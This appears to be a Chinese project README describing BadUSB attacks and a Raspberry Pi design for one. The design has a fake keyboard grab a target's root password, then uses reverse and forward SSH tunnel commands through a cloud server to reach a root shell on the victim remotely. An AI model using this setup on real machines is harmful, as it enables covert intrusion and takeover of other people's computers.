#Raspberry-BadUSB-test

🤣5ea1
BadUSB
发展历史
在2014年美国黑帽大会上,安全研究人员JakobLell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”的攻击方法,这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当危险的状态
Badusb Hid攻击原理
HID是Human Interface Device的缩写,由其名称可以了解HID设备是直接与人交互的设备,。一般来讲针对HID的攻击主要集中在键盘鼠标上,因为只要控制了用户键盘,基本上就等于控制了用户的电脑。攻击者会把攻击隐藏在一个正常的鼠标键盘中,当用户将含有攻击向量的鼠标或键盘,插入电脑时,恶意代码会被加载并执行
硬件层面
USB 设备通常有用于数据存储的可重写内存芯片和独立的控制器芯片。控制器芯片类似低功耗计算机,启动时会从内存芯片加载引导程序,而内存芯片的第一段包含让 USB 运行的编程,攻击者可改写这段编程,植入恶意代码到 USB 固件中
系统信任层面
计算机默认信任像键盘、鼠标这类人机接口设备(HID)。BadUSB 可伪装成 HID 设备,当插入电脑时,电脑会将其当作正常输入设备,使其能绕过一些安全检测,向电脑发送恶意指令
攻击方式
模拟键盘输入
将 U 盘等 USB 设备改造成能模拟键盘输入的 BadUSB,插入目标电脑后,自动输入一系列指令,如打开命令窗口、下载并运行恶意软件等
伪装成其他设备
还可伪装成网卡、鼠标等设备,若伪装成网卡可进行网络攻击或数据窃取;伪装成鼠标可通过模拟鼠标操作来执行恶意行为
攻击流程设计
很富裕的仗,一台树莓派4b,搓模拟键盘肯定是绰绰有余的了,原版BadUsb用的是邮箱方式,把数据发送回来,因为树莓派本身也能控制,所以方法会有很多。
我目前的设计是通过ssh的连接,登录root拿到shell,root密码通过badusb去拿,然后从本机去连,为了超出局域网的限制,再选择用攻击机连接云服务器,云服务器连接目标机,输入密码连接。
攻击机-服务器-目标机
这里用ssh正反向隧道的方式
目标机-服务器
因为要控制目标机,所以在目标机上建一个反向隧道
ssh -R 2222:localhost:22 Username@ip
假设你有一台位于内网的机器,由于没有公网 IP,外部网络无法直接访问该机器。但你有一台具有公网 IP 的远程服务器,通过上面的反向隧道命令,可以让远程服务器监听其 2222 端口,并将对该端口的访问转发到内网机器的 22 端口,从而实现从外部网络通过远程服务器间接访问内网机器的 SSH 服务
攻击机-服务器
因为上面的外部2222端口连接了目标机,2222口被转发到了内网的22端口上,所以攻击机应从内网进行访问,故先连入内网
ssh -L 2222:localhost:2222 Username@ip
通过上述指令进入服务器内网,再转发2222端口
ssh -p 22 root@localhost
最后在内网通过22端口,进入到目标机中